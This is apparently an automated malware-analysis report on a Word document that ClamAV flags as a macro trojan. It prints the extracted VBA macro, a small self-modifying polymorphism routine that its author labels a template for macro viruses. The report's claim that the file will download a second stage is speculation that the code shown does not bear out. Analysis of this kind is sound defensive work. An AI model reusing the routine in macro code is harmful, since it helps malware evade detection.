MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Win.Trojan.W97M-1. It contains VBA macros, indicated by the 'OLE_VBA_MACROS' heuristic. The extracted VBA code, named 'macros.bas', appears to be a simple obfuscation routine that modifies its own source code by prepending comments containing application details. While the exact payload is not directly executed or evident, the presence of obfuscated macros strongly suggests an intent to download and execute a second-stage payload.
Heuristics 2
-
ClamAV: Win.Trojan.W97M-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.W97M-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 794 bytes |
SHA-256: abd19f4cf648dbf0dcd9903384f12acd7225a7f3c64b1db9230116368da3140e |
|||
|
Detection
ClamAV:
Win.Trojan.W97M-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VSMP_DEMO"
Function VSMP()
Y = Application.VBE.ActiveVBProject.VBComponents("VSMP_DEMO").CodeModule.CountOfLines
With Application.VBE.ActiveVBProject.VBComponents("VSMP_DEMO").CodeModule
For x = 2 To Y Step 2
.ReplaceLine x, "' " & Application.UserInitials & Now & Application.UserName & Application.ActivePrinter & Now
Next x
End With
End Function
' Vic's Simple Macro Poly
' Replace "VSMP_DEMO" with the name of your macro vius
' Remove these comments
' peace,
' VicodinES /CB /TNN
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.